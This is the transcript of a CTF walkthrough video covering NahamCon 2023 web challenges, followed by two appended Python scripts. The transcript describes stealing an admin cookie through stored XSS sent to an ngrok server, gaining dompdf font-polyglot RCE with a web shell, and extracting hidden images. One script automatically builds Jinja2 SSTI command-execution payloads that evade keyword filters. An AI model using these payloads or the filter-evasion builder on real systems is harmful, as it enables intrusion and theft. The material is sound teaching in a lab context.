NahamCon CTF 2023: Web Challenge Walkthroughs

Captions
In this video we're going to take a look at some of the web challenges from the NahamCon CTF 2023. I already made a video for Marmalade 5 for the Intigriti channel, so I'll leave a link to that in the description below; I won't be covering that again in this video. But let's start off with Star Wars, which has the most solves at the moment. The description says "if you love Star Wars as much as I do, you need to check this blog", and we've got an instance already launched, so let's go and take a look at it.

All right, so we get through to this X-Wing page. We've got a login box that says "invalid session, we need to sign in", so I'm going to try admin/admin and it says invalid credentials. Let's go and sign up instead then. Normally I just try to see if we can register an admin account, just out of interest, but it says the username is taken, so let's do cats/cats. Sign up successful, and we'll log in. Once we log in we can see that we've got this blog post; we can click on "read more", and down here we have a comment box, so it's going to be worth trying some stuff in here. We could have a look at our source code, we could have a look to see if there are any more posts (can we just change this to 2, maybe there's something interesting there?), but if you get through to a page like this and see there's a comment box, that's probably where you want to start focusing. Maybe to begin with you'll just try something to see whether you can actually inject some HTML in here, so can we do a header, say <h1>hi</h1>? Send that and see, does it render big? And it does. It says that it needs to be reviewed, which is interesting; maybe that means there's some administrator who's actually checking our posts. If that's the case, then what if we have some kind of script in here which reflects back to the admin whenever they are reviewing the comment? Because then it will execute in their browser, and maybe they've got some interesting cookies. Do we have any cookies? Let's have a look. We've got this one here, which is a JWT, which makes sense because we've just registered and logged in.

So let's try and put a script in here. The first thing we want to do is have somewhere for this to call back to, because we want to retrieve the admin's cookie, and to do that, if we have a script in here, we need the cookie to go somewhere, and that's going to be a server that we control. So I'm going to use webup here, which is an alias I have just to create a Python web server (that's the command, in case anybody wants it). I'm also going to open up an ngrok server, so we'll do "ngrok http 80". Basically this is our local HTTP server, so it can't be accessed from the internet, and this is just exposing it to the internet: we're saying that we want you to redirect any request to and from the local HTTP server to an actual web address, which is this one here. I'm going to take a copy of it, and then this is what we're going to use. So let's go back. There are a lot of different ways that you could do this, a lot of things you could try. Let me just create some script tags first of all and close that off. The way I did this was new Image(), then we set the source to be equal to our server, and then we want to grab the cookie, so I'm going to say "c=" (you don't really need this here, it's just so we can separate things out), and then we say "+ document.cookie". That looks good to me, let me try and click on send. There we go, "the admin will review it", so now we just need to wait for the admin to review it. We go down to our server, and it was very quick: you see we've got this request, although this might be our token from the page reloading. I think it was, yeah; notice these two tokens are different. Whenever we posted that it refreshed the page, so it actually triggered in our browser and we've stolen our own cookie, and that's not what we want. We want this cookie here, and we can just go and replace the one that we have (do F12, or do this in your Burp Suite Repeater), refresh the page, and we now have access to an admin panel. We go and open that up and we see that we've got our flag.

The next challenge is called Stickers, and the description says "woo, stickers! Hackers love stickers. You can make your own with our new website", and we're told that the flag is at the root directory, /flag.txt. We've got a web service to connect to, no source code downloads, so let's go and take a look at it. We open it up and it's a sticker shop, and we can put in some information here. So the first thing I did was just try to put in some server-side template injection payloads, just to see whether these render as they are or do they turn into a 49. I put this into each of the form fields and submit; however there is some validation, so we can do an actual email, try and submit again, and we'll be told we need a number, and we'll basically be told this for each of the fields. So I'm just going to do that now and submit. The organisation name doesn't render, so it doesn't look like there's an SSTI vulnerability. There's no form validation now, so we could go and try to change some of the stuff, like see if we can actually input characters in here, and we get an error message. So let's go back and have a look at the request in Burp Suite. We don't actually see it here by default; you'll see if I refresh the page there's just nothing showing up, and that's because it's hiding binary content. We can just tick this box, click apply, and then we'll see all of these requests in here, and it means we can have a look at the headers, see if there's anything interesting, have a look through the content, and very quickly we'll see dompdf 1.2.0. So the first thing we should do here is search "dompdf 1.2.0 exploit". We do that and we'll get plenty of results back about a zero day in dompdf, and there's a GitHub link here. This is the one that I went through, by Positive Security; it has a PoC, so there's a demo application and then an exploit as well, so you can test this out locally, and here's the attack. So dompdf 1.2.0 is vulnerable to remote code execution via a TrueType font and PHP polyglot file, and here's a summary of the attack: the attacker injects some CSS into the PDF exporter, the PDF exporter requests the font from our server, we deliver a malicious PHP font, and then it's going to send us back the PDF, and now we can go and find that cached font, which is actually some malicious PHP script. OK, all good so far.

So we can clone this repo. We don't need to run the demo application, because we've already got one, but we can run the exploit server, and if you follow this through it will work. The only thing is it's currently set to call phpinfo, so we would want to change that to be something malicious like a reverse shell, and we can do that just with this repo. There's also another link, which I'm going to take a copy of, because if you want to do this manually from the start then this would be a better article to go through. This basically tells us we can look for a font on our system, we can copy that font to a PHP file, and then we can add our reverse shell to the end of that. We create a malicious CSS which has some details in it; this is important, because the name of the font and then the weight and the style will be used to actually find the font once it's been uploaded. So you see here the path is dompdf/lib/fonts and then the name of the font, underscore the font weight/style, underscore the MD5 of the URL, which we get down here, making sure that you use the -n flag to remove the newline. So we need to do this manually if we're using the example we have here; we basically just need to make sure that we use whatever they've got, so exploitfont_normal_ and then we need to update the MD5 with the address of wherever we're hosting this PHP script. OK, so you can pick either of these to do. I guess let's go through the manual version, why not. I'm going to take a copy of this. This is actually incorrect, I should be looking for ttf, not PDF, so I'm going to search here for ttf. Oh, that's not ttf, that's tff. All right, next up, I'll just grab any of these. I'm going to do copy, and then we'll copy it to, what name do we have here, that was evil.php. It doesn't really matter as long as we know what it's called, but I'll save it to evil.php. Then I've also got a web shell in here that I use, a very standard PHP shell, and we want to insert this basically at the bottom of the script. We need to use the GET parameter here, because if we put in our reverse shell location, our URL, then you'll have a problem: basically if you use ngrok like I use, you can only use it once at a time, so if you want to use it for your HTTP server and for your TCP you'll need to do one after the other, and we don't get the TCP URL until we've exited the HTTP URL. So we basically have to use this. I'll open up evil.php; it's going to say it can't render it, but let's just try. OK, this is a really big one, the example online is tiny, hopefully that doesn't cause any problems. That's it, we'll save that in there (I don't know why I always get this error message). Let's go back. We also need a CSS, so we create evil.css and we put the font information in here. We need to put in our URLs, so I'm going to create a web server here again; we'll do webup, then I'm going to split this and do "ngrok http 80", we get this URL and that's going to be the URL that we use. So we'll go and paste this in here and save that, and now we need to get the MD5 for that as well. So we'll do "echo -n" and then the URL followed by evil.php, and then we want to send that to md5sum. There we go, that's our MD5, we'll need that shortly as well. OK, I think that's all looking good. So now we need to go and basically load this in the PDF converter, so where we had the organisation I'm going to paste this in. I need to grab the ngrok URL again and just replace this, and that should be that. Let's hit enter, go back, and we can see the request to evil.php and evil.css. That looks good. All right, now we need to go through then. Let me take a copy of this; I'm going to paste this in here, and let's just grab an example of what we want here. So here's the path; it's basically going to be the same, because we called it the same thing. The only thing that's going to be different is the MD5, so I'll go and update the path, that's in there, go and grab the MD5 (where was it? It was in the terminal), take a copy, there we go. We run that and we get back our font, which is good, so we've located the file that we uploaded. Now we do "cmd=" and then whatever we want. The problem is I used such a big font file that now we have to scroll down all the way to the bottom of it to actually list out the file directory. I guess if we go to Burp Suite it might look a little bit better. Let's go, and then let's try and do cat, plus for the URL encoding, and then flag.txt. Send, scroll down all the way to the bottom, and there's our flag.

The next challenge is called Hidden Figures, and the description says "look at this fan page I made for the Hidden Figures movie and website, not everything is what it seems", and again we've got no source code, so just open up the website and go and take a look at it. There are a lot of links on the page which don't go anywhere; you can see whenever you highlight them you just have this little anchor symbol at the bottom, and that's the same with all of the links on the page as far as I'm aware. So we can have a look at the page source and see if there's anything of interest in here. Notice that we have our assets directory, so we can go into assets and then, if we list the directory, we can see what files are in here. I went through all of these files; a lot of them just seem to be fairly default files and didn't have anything hidden in them. We have our image here, that's one thing, so we'll download the image. Let me save that. I did notice that it said PNG but it was actually JPEG whenever we tried to download it, so we might check the EXIF data on this. Oh, I'm in the wrong directory. exiftool on hidden figures, just to see if there's anything of interest in here, anything interesting in strings. Obviously it's mentioning Hidden Figures as the challenge name, which is a bit of a hint that there might be something hidden somewhere. I was also thinking about the CSS as well, maybe we could go and have a look at the style sheets; we have one with 3840 rules, so I had a look through here just doing some keyword searches for "flag" and things like that, but yeah, nothing of interest. We don't have any cookies or anything like that (oh, where is my storage? There we go). Well, we do have cookies, but no cookies of interest for the site, although there is this one in local storage, "test", which is one I tried playing around with as well; it just resets every time you reload the page, so yeah, that didn't get us anywhere.

However, one of my teammates noticed that if you search through the source code of the page there are some very large base64 encoded strings around the images. You can see that we don't have word wrap on here, so let me move all the way over to the right and scroll down; here's one of them. In fact, let me take a copy of all of this and we'll go and put it into Sublime, and then we'll be able to see the word wrapping a bit better. I don't know, does it have it on by default? Yes, OK. So here's a big chunk here, a big chunk of base64 encoded data, and what we can do is extract this, base64 decode it, and then go and see, does it match up to what we have for the image already? You can see we've got some different images in here; this is the thumb image, so let me go up to the image that we downloaded, the cover image. I think it's this one, yeah, so here is "hidden figures paperback movie" and then we have all this base64 encoded data. If you try to highlight all that it's going to take a while just to scroll through it, so what I'll do is just save this to a new file. Just double click or triple click to select the whole thing, and then we'll just take out the bits that we don't want. All right, so where does it start? It is here, so take that out, and then we'll just replace the spaces with nothing, and there we go. We can save this now to a file; we'll call it data.b64, and now we base64 -d to decode the data and send that to a file. Let me minimise this so we can see it a bit better. Now we can do "file file", and we'll see it's a JPEG image, so we could just open that up as well. Let's do a diff on the hidden figures image and the file: they differ. I'm going to move file to new.jpg and let's have a look at what we've got. So new.jpg: you can see there's a difference in the file size of these two, so you might try checking strings greater than 10 characters; do that in new.jpg, do the same in hidden figures, but we don't get anything of interest from doing that. We could also check exiftool on new.jpg to see if that matches, and it does. We can try binwalk to extract the files. This didn't work for me, I don't think; let me try this again. Oh, what's the name of it? Oh, it didn't create a folder at all, OK, but it did show that there are two files. Let me do "foremost new.jpg" and "tree output". I noticed that there are two JPEGs in here, so go to the output folder, have a look at the JPEGs, and we've got our cover image and then we also have another image saying "thank you Mario, but our princess is in another castle". So we could analyse these images a little bit further; I did do that as well, but there was nothing more to find. It says "in another castle", so this is kind of a hint that maybe we should have a look to see if there's anything else of interest on the site, and if we do that we'll see basically that we have some other base64 encoded images. So I'm going to scroll down, let's grab this one at the bottom (I can't remember which one it is now), so let's grab this one. We'll do the same thing again here, just extract. We could use some regex to do this, it'd probably be a quicker way to do it overall, but this will be fine for now. So I'm going to do that again, let's do that again, and we'll check the file. It is JPEG again, so we'll move the file to new.jpg; I'm just overwriting the old one. I'm going to remove the output folder so we can run foremost again. We do that and let's go and check the output. We've got a PNG this time, and the PNG has the flag in it. Now the only thing is I couldn't be bothered typing all this out, so I just had a quick Google on how we could do that automatically. Let's go into the PNG folder, we'll install tesseract, and now we can do "tesseract -l eng" (-l for language) and then we'll give it the PNG file and then we want that to print to output. We'll just print out the output.txt and there's our flag; we can just go and copy and paste it now.

The next challenge is called Obligatory, and the description says "every capture the flag competition has an obligatory to-do list application, right?", and again no source code. Let's just open up the challenge page, and it tells us to log in. As usual, try some default credentials, might try and run it through sqlmap or something like that, but we've got a sign up link, so let's go there instead. I did try and register as admin but as usual it was taken, so let's register cats. We'll log in as cats and we get through to the to-do application. So as usual we might try some injections here; let's see, can we put in an H1 tag and see if it renders? But it doesn't. What can we do with it? We can select it, we can delete it, we can have a look at our completed and active tasks, but yeah, nothing of interest. Maybe we'll try some server-side template injection payloads. What I did actually was I went to HackTricks SSTI and grabbed a polyglot; search for "poly", here we go. All right, so we can grab this one and just try and find out, does it come back with some error message or any kind of blacklist filters? We add this here and submit, but there doesn't seem to be any issue; the text just renders as text. I did try some of the things here like using sqlmap and also brute forcing other SSTI payloads, because I thought this was going to be the issue, but yeah, the notes don't seem to be vulnerable. So what else do we have? Let's try and create another task, and one thing that we do have when we do that is it just redirects us back to the same page with this GET parameter, "success=task created". So what about if we take a copy of that SSTI polyglot, paste it in here and then hit enter? Notice we've got back this message saying "hacker detected, the following are not allowed", and then we've got a lot of different blacklisted words and characters. So we know where we want to try our payloads. We can go back to HackTricks and try some of the stuff that we have in here; if you search for "bypass", that's what we're going to be particularly interested in. So do we have any? It's looking for the options on the side, which is kind of annoying. Here we go, bypass filters (note that's Spring Framework), here we go, Python: "check out the following page to learn tricks on arbitrary command execution bypassing sandboxes in Python". We can go through to this and basically start trying payloads to see what gets blocked and what isn't. I mean, we can see what's filtered out anyway, so we know that we're not able to use underscores, we know that we can't use dots, we can't use any of these words: exec, eval, system, popen. So quite a lot of things are blacklisted. We scroll down for a while, so we could try some of these payloads. We know that builtins is blocked, we know that popen is blocked (that's not popen, it's open), but we have "discover arbitrary execution", so this one has a good example which actually uses hex to replace the underscores to bypass any checks on underscore. So that's one thing we'll need to do, because we know that we can't use underscores, but we can also use that technique more generally on text, or we can use concatenation as well. So we could just use a plus in between; instead of saying class we can say "cla" + "ss" and that won't trigger that check.

So let me take a copy of this one, let's go back. This isn't going to work, because there's a lot of stuff in there which is not allowed; it'll come back saying hacker detected. Well actually, the very first one of that is blocked, which is class. Let me go to the PayloadsAllTheThings links; this is a Jinja2 filter bypass and I kind of started with this one. So I started with this, let's enter that. It's not going to work, because we don't have globals blocked but we have builtins blocked, so if we take out this bit, basically I just want to try and filter this down. Oh, I'm missing the curly braces at the end. And you can see that it does actually print out the globals. So we could take a copy of this and go and put this into Sublime, or actually putting it into something to format the JSON would be better; you can go to something like JSON stack viewer, which I often use (not having my favourites here). I guess if you have an extension in code maybe this will format automatically as well, but yeah, we could go and have a look through this and see what we have access to. Really there's not too much of a complex filter. I was overthinking this at the beginning and trying to use extra request parameters, so rather than (oh, where's my page gone?) rather than submitting the blacklisted words in this success parameter, you can include another parameter like "c=" and that would have builtins, and then you would reference that in this parameter. But the problem is you can't use dots, so in order to access the request parameter you have to do request.param or something, which won't be possible. However, we don't need that; we can basically just go and add some concatenation and some more hex encoding. So let me take a copy of this again, let's go over to Sublime and we'll paste this in. Oh, that was the wrong one, I meant to copy the one from PayloadsAllTheThings. OK, we'll paste this in here. We're not allowed to use builtins, so we can say "built" and then we can just do a plus in between, so there we go, we've separated those. And I think we can't do that with, we can't use import either, so again just the same thing, adding a plus in there. We can't use popen, so a lot of pluses there as well. And I think that's it, let's try and do that, and there we go, we get back our id. Actually, whenever I tried to do this that didn't work, I had to use a reverse shell in order to get it; let me try now. I mean, that works, so I guess we can just try and do cat flag.txt now, although, oh, we can't use spaces, and we can't use dots actually either. OK, let's go to CyberChef and we'll convert the command from hex. I've got too many things open, I'm going to start closing things down. All right, so "cat flag.txt": I'll take a copy of this, we'll put it in CyberChef and then we'll convert it to hex, and we'll make sure the format is backslash x. Take a copy of that and then we'll just replace this here. We do that and we don't get the flag. Oh, I know why: because the flag isn't there actually. OK, let's do ls. See, I got a shell last time and then realised we have to go and enumerate a little bit, so you can see ls works. We can't use spaces, so I'm going to do "ls db"; we'll take a copy of that and then paste that in here, and we've got this db.sqlite. What I did (you could do this in a few different ways; we could copy that over and open it in something like sqlitebrowser) was just strings on db, and what was it called again, well, you could do db.sqlite, you could also just do an asterisk here as a wildcard and just say give us strings, because there's only one file in there anyway. So let's paste this in and submit, and you see that we get back the strings from the database, which contain our flag.

So there are two more web challenges left, which are Museum and Transfer. I did spend a bit of time on Museum but haven't made much progress, so if I do get it solved I'll add it to the video, but I have some things to do today and I want to try and get this edited and uploaded ready for tomorrow. Reminder that I'm not recording the Marmalade 5 challenge on this channel because I've done that over on the Intigriti channel; there'll be a link down to that in the description, and also a link to the write-ups for this, so for each of the challenges that I've solved I also made a write-up. If you're interested in seeing the solve scripts or anything like that, you can check the GitHub link in the comments. Anyway, hope you enjoyed this video; if you have any questions or comments, as ever, leave them down below. Thanks.
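For Hidden Figures the video pulls the base64 blob out of the page by hand, strips the whitespace, decodes it, runs file, then lets foremost carve the second image appended after the first. The Python below is an added example (not the video's own solve script) that does the same with the standard library: a regex for long base64 bodies, a signature sniff that ignores the MIME type the page claims, and a carver that splits a blob on JPEG/PNG signatures and end markers. It assumes the images are embedded as data: URIs; the sample page is constructed inline, with a fake JPEG carrying a fake PNG after its EOI marker.

```python
import base64
import re

# File signatures the carver keys on (the same magic bytes `file` and foremost use)
SIGNATURES = {
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
}

# Assumed: images are embedded as data: URIs. Whitespace is allowed inside the body
# because a wrapped source view or an editor copy inserts line breaks.
_B64_RE = re.compile(r"base64,([A-Za-z0-9+/=\s]{64,})")


def extract_b64_blobs(html: str) -> list:
    """Every long base64 body in the page, decoded to bytes."""
    return [base64.b64decode(re.sub(r"\s+", "", m)) for m in _B64_RE.findall(html)]


def sniff(data: bytes) -> str:
    """What the bytes really are, whatever extension or MIME type the page claims."""
    for kind, sig in SIGNATURES.items():
        if data.startswith(sig):
            return kind
    return "unknown"


def _end_of(kind: str, data: bytes, start: int) -> int:
    if kind == "jpeg":
        eoi = data.find(b"\xff\xd9", start + 2)        # JPEG end-of-image marker
        return len(data) if eoi == -1 else eoi + 2
    iend = data.find(b"IEND", start)                  # PNG: IEND chunk + 4-byte CRC
    return len(data) if iend == -1 else iend + 8


def carve(data: bytes) -> list:
    """Split a blob into every embedded image in file order: the cover image plus
    anything appended after its end marker, which is what foremost found in the video."""
    found = []
    for kind, sig in SIGNATURES.items():
        pos = data.find(sig)
        while pos != -1:
            found.append((pos, kind))
            pos = data.find(sig, pos + 1)
    return [(kind, data[pos:_end_of(kind, data, pos)]) for pos, kind in sorted(found)]


# Constructed sample: a tiny fake JPEG followed by a fake PNG, served as a data: URI
# whose MIME type says png while the bytes say jpeg (as the challenge did).
_COVER = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"cover image bytes" + b"\xff\xd9"
_HIDDEN = SIGNATURES["png"] + b"\x00\x00\x00\rIHDR" + b"hidden payload" + b"IEND\xaeB`\x82"
SAMPLE_HTML = ('<img alt="cover" src="data:image/png;base64,'
               + base64.encodebytes(_COVER + _HIDDEN).decode() + '">')

if __name__ == "__main__":
    for blob in extract_b64_blobs(SAMPLE_HTML):
        print("outer file:", sniff(blob), len(blob), "bytes")
        for kind, part in carve(blob):
            print("  carved", kind, len(part), "bytes")
```

Run it against a saved copy of the real page source to get every embedded image and its trailer in one pass instead of repeating the copy/strip/decode/foremost cycle per image.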
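For Obligatory the bypass is done by hand: hex-escape the underscores, split builtins/import/popen with a plus, then hex the whole command because spaces and dots are banned. The Python below is an added example (not the video's solve script, and the blacklist is reconstructed only from the words and characters named in the captions, not the challenge's full list) that mechanises that: a model of the filter, an encoder that rewrites any string literal so its source text contains no blocked token, a decoder that evaluates the result with Python escape rules the way Jinja2 does (so the payload can be round-trip checked before it is sent), and the PayloadsAllTheThings attr() chain built from encoded literals. It assumes quotes, plus and backslash are allowed, as they were in the video.

```python
import ast

# Blacklist as named in the video's "hacker detected" message (reconstructed; the real
# list was longer): no underscores, dots or spaces, and none of these words.
BLOCKED_CHARS = "_. "
BLOCKED_WORDS = ["class", "builtins", "import", "popen", "exec", "eval", "system"]

# Jinja2 filter-bypass chain from PayloadsAllTheThings with hex-escaped underscores.
# It still spells out builtins/import/popen, so this filter rejects it.
NAIVE_PAYLOAD = ("{{request|attr('application')|attr('\\x5f\\x5fglobals\\x5f\\x5f')"
                 "|attr('\\x5f\\x5fgetitem\\x5f\\x5f')('\\x5f\\x5fbuiltins\\x5f\\x5f')"
                 "|attr('\\x5f\\x5fgetitem\\x5f\\x5f')('\\x5f\\x5fimport\\x5f\\x5f')('os')"
                 "|attr('popen')('id')|attr('read')()}}")


def find_blocked(text, chars=BLOCKED_CHARS, words=BLOCKED_WORDS):
    """Model of the challenge filter: any listed character, or any listed word as a
    case-insensitive substring, trips it. Returns what tripped (empty means clean)."""
    low = text.lower()
    return [c for c in chars if c in text] + [w for w in words if w in low]


def hexify(s):
    """'\\x5f'-style escapes; Jinja2 unescapes string literals with Python rules."""
    return "".join(f"\\x{ord(c):02x}" for c in s)


def encode_literal(value, chars=BLOCKED_CHARS, words=BLOCKED_WORDS):
    """A Jinja2 expression equal to `value` whose source text contains no blocked token:
    hex-escape blocked characters, then split each blocked word across a '+'
    concatenation ('buil'+'tins'). Assumes quotes, '+' and backslash are allowed."""
    out = "".join(hexify(c) if c in chars else c for c in value)
    for w in words:
        i = out.lower().find(w)
        while i != -1:
            mid = i + len(w) // 2
            out = out[:mid] + "'+'" + out[mid:]
            i = out.lower().find(w)
    return f"'{out}'"


def decode_literal(expr):
    """Evaluate such an expression as the template engine will, to verify the
    encoding round-trips before it is fired at the target."""
    def walk(n):
        if isinstance(n, ast.Constant):
            return n.value
        if isinstance(n, ast.BinOp) and isinstance(n.op, ast.Add):
            return walk(n.left) + walk(n.right)
        raise ValueError("not a string concatenation")
    return walk(ast.parse(expr, mode="eval").body)


def build_payload(command, chars=BLOCKED_CHARS, words=BLOCKED_WORDS):
    """NAIVE_PAYLOAD's attr() chain with every literal passed through encode_literal,
    including the shell command (spaces and dots become hex escapes)."""
    def lit(s):
        return encode_literal(s, chars, words)
    return ("{{request|attr(" + lit("application") + ")"
            + "|attr(" + lit("__globals__") + ")"
            + "|attr(" + lit("__getitem__") + ")(" + lit("__builtins__") + ")"
            + "|attr(" + lit("__getitem__") + ")(" + lit("__import__") + ")(" + lit("os") + ")"
            + "|attr(" + lit("popen") + ")(" + lit(command) + ")"
            + "|attr(" + lit("read") + ")()}}")


if __name__ == "__main__":
    print("naive payload trips on:", find_blocked(NAIVE_PAYLOAD))
    p = build_payload("cat flag.txt")
    print(p)
    print("encoded payload trips on:", find_blocked(p))
```

The decode step is the part worth keeping: a payload that passes the filter but no longer evaluates to the intended string fails silently, and the template error page is usually suppressed.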
Info
Channel: CryptoCat
Views: 9,382
Keywords: NahamCon, NahamSec, NahamConCTF, NahamCon CTF, NahamSecCTF, NahamSec CTF, CTF, Capture the Flag, John Hammond, XSS, SSTI, polyglot, ttf, domPDF, RCE, remote code execution, PoC, WAF, WAF bypass, JWT, steal cookie, web, web security, bug bounty, oscp, pentesting, pen-test, hacking, ethical hacking, learn to hack, dvwa, DVWA, javascript, python, html, burp suite, burp, intruder, repeater, devtools, portswigger, appsec, websec, infosec, cybersecurity, hackthebox, CVE, vuln, exploit, coding, ngrok, intigriti, bug, bugs, free, ctf
Id: XHg_sBD0-es
Length: 26min 8sec (1568 seconds)
Published: Sun Jun 18 2023